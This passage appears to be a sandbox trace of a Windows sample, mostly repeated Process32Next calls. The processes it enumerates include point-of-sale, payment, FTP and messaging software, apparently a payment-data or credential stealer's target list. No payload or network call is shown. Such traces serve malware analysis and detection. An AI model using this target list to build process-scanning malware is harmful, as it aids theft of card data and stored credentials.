szExeFile="winscp.exe")) returned 1 [0193.341] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0193.344] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0193.346] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0193.349] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0193.352] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0193.355] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0193.358] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0193.407] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0193.410] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0193.413] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0193.415] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0193.418] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0193.421] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0193.424] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0193.426] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0193.430] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0193.433] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0193.435] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0193.438] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0193.440] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0193.456] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0193.459] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0193.502] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.554] Process32Next (in: hSnapshot=0x123c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0193.557] CloseHandle (hObject=0x123c) returned 1 [0193.557] Sleep (dwMilliseconds=0x64) [0194.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a0 [0194.055] Process32First (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.058] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.060] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.062] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.067] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.069] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.071] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.114] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.118] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.119] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.121] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.123] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.124] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.126] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.127] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.129] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.131] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.133] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.135] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.136] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.138] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0194.139] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.141] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0194.143] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.144] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0194.146] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0194.148] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0194.150] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0194.155] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0194.157] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0194.159] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.160] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.162] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0194.166] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.167] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.169] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0194.171] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0194.173] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0194.175] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0194.176] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0194.178] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0194.180] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0194.182] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0194.184] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0194.186] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0194.187] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0194.189] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0194.191] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0194.195] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0194.197] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0194.199] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0194.200] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0194.202] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0194.204] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0194.205] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0194.207] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0194.209] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0194.210] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0194.213] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0194.215] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) 